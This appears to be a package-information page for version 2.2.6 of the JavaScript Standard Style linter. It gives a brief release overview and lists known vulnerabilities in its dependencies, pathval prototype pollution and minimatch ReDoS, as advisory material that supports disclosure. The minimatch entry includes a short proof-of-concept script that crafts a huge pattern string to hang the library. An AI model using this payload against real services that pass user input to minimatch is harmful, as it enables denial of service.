Standard version 2.2.6 represents a minor update to the popular JavaScript Standard Style linter, building upon the foundation laid by version 2.2.5. Examining the metadata of both versions reveals that the core dependencies and development dependencies remain consistent, indicating that the fundamental linting rules and build process haven't undergone significant alterations. Both versions rely on the same versions of crucial tools like eslint, jscs, and jshint for code analysis, and utilities like glob, minimist, and run-parallel for file system operations and task management.
The key difference lies in the releaseDate. Version 2.2.6 was published on January 31, 2015, a day after version 2.2.5, suggesting that the changes introduced were likely refinements, bug fixes, or possibly enhancements to documentation or internal mechanics rather than groundbreaking feature additions. For developers already using Standard, this signifies a stable and incremental improvement. Upgrading from 2.2.5 to 2.2.6 presents a low-risk endeavor, likely addressing minor issues without introducing breaking changes or requiring extensive code modifications. The continued use of the same core set of dependencies offers assurance that the core linting behavior remains predictable and familiar. Due to the nature of rapid iteration that might involve a new release after one day , verifying the upgrading notes may lead to more information about that patch release.
All the vulnerabilities related to the version 2.2.6 of the package
Prototype pollution in pathval
A prototype pollution vulnerability affects all versions of package pathval under 1.1.1.
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require(“minimatch”);
// utility function for generating long strings
var genstr = function (len, chr) {
var result = “”;
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
var exploit = “[!” + genstr(1000000, “\\”) + “A”;
// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.